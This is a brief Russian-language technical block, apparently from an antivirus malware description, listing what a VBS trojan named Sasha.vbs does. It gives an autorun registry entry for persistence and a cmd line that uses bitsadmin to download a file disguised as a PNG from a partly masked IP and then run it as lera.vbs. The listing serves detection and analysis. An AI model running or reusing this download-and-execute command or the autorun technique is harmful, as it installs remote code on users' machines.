Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Sasha.vbs' = '%APPDATA%\Sasha\Sasha.vbs'
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Sasha\Sasha.vbs"
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://17#.#3.7.199/pi/st6.png" "%cd%\lera.vbs" && start lera.vbs
- %APPDATA%\Sasha\Sasha.vbs